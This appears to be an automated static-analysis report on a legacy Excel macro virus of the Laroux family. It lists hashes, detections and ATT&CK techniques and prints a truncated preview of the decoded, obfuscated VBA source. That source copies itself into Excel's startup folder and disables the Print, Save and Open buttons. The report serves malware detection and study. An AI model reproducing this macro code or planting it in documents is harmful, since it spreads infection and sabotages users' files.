Xls.Trojan.Extras-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 c285f294573a6cf8…

MALICIOUS

Office (OLE)

73.0 KB Created: 1998-10-15 09:28:17 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 7ca11c8d52c91e731e95b5756620081e SHA-1: 27a82d370f37aeb9bcffa8184a4824208234dcc6 SHA-256: c285f294573a6cf8c6f6ca6cb343bcea376e002b2d2d96f7cfbc25c50671bf42
280 Risk Score

Malware Insights

Xls.Trojan.Extras-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5 macro virus (Laroux) by multiple heuristics, including critical ClamAV detections. The VBA macros contain Auto_Open and Auto_Close subroutines, and one subroutine attempts to disable the print button and save a new workbook, indicating a potential attempt to prepare the system for further compromise or evade detection. The presence of Auto_Open and Auto_Close macros strongly suggests it was delivered as a spearphishing attachment.

Heuristics 5

  • ClamAV: Xls.Trojan.Extras-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Extras-2
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30384 bytes
SHA-256: 20b512594b9704eb01e38640b5702707d803ff36decedd84aa846abe4d69109a
Detection
ClamAV: Xls.Trojan.Extras-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vzsevihUUP8r9VLOxJTfWQHc0"





Option Explicit
Private Sub hmhhmrnhnnrhmhhnnmmnnrhnnmhhnn()
Dim mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh As Integer
Randomize
mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh = Int((4 - 1 + 1) * Rnd + 1)
Call rnnhnrnnrnmrnhnnhmhrhmrrhnrnmh
Select Case mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh
Case 1
Call rnmhhhnnnhmnnnrhhhhnhhhnrhmmhr
Case 2
Call mnhrnnhhhhrnmnmnmhrhrhhmmhhhmn
Case 3
Call nnmhrhmhrnrmmrhnrmhmnhmmnnmnrh
Case 4
Call nmhrrhmmhhrrmhhnmmnmmnnnhmnrmn
End Select
End Sub
Private Sub nnmrhnmmrnrhhmhnrhhmmmhhhmnrmr(ByVal hnhhnnnrrrnnnmnnnnnnnrmnhmhrnr As String, ByVal rrhnmhrnhhnmnhhhhnhrnmmhnrmnhm As String)
Application.ScreenUpdating = False
Dim mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn, mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn As String
Workbooks.Add
ThisWorkbook.Sheets(1).Visible = True
ThisWorkbook.Sheets(1).Copy before:=ActiveWorkbook.Sheets(1)
With ActiveSheet
.Name = mnhrnnhmhrrrhrhmrnmnmmhhmrmmmn(-5 + 6 * 5)
.Visible = False
End With
mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn = ActiveWorkbook.Name
mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn).SaveAs FileName:=hnhhnnnrrrnnnmnnnnnnnrmnhmhrnr & rrhnmhrnhhnmnhhhhnhrnmmhnrmnhm, FileFormat:=xlNormal
ChDir mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn
ThisWorkbook.Sheets(1).Visible = False
Application.ScreenUpdating = True
End Sub
Private Sub rnmhhhnnnhmnnnrhhhhnhhhnrhmmhr()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Print" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Private Sub nmhrrhmmhhrrmhhnmmnmmnnnhmnrmn()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Save" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Private Sub nnmhrhmhrnrmmrhnrmhmnhmmnnmnrh()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Open" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Sub Auto_Help()
Attribute Auto_Help.VB_ProcData.VB_Invoke_Func = " \n14"
Randomize
With Application
.SheetsInNewWorkbook = Int((255 - 1 + 1) * Rnd + 1)
.Help
End With
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr, rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr, nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm As String
Dim mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh As Boolean
Dim hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn As Variant
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "EXTRAS.XLS"
If Left(Application.OperatingSystem, 3) = "Mac" Then
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "Macintosh Extras"
ElseIf Left(Application.OperatingSystem, 10) <> "Windows 3." Then
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "Windows Extras.xls"
End If
rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr = Application.StartupPath & Application.PathSeparator
rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr = Dir(rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr & nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm)
If rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr = "" Then
nnmrhnmmrnrhhmhnrhhmmmhhhmnrmr rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr, nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm
Else
mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = False
For Each hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn In Application.Workbooks
If hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn.Name = nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm Then
mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = True
Exit For
End If
Next
If mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = False Then
Application.ScreenUpdating = False
Workbooks.Open FileName:=(rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr & nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm), IgnoreReadOnlyRecommended:=True
End If
If Workbooks(nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm).Modules.Count = 0 Then
Application.ScreenUpdating = False
Workbooks(nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm).Close savechanges:=False
On Error GoTo hrmhrnnmmhhnrhrrrmmmmmhmmmhmmr
Kill (rhhnm
... (truncated)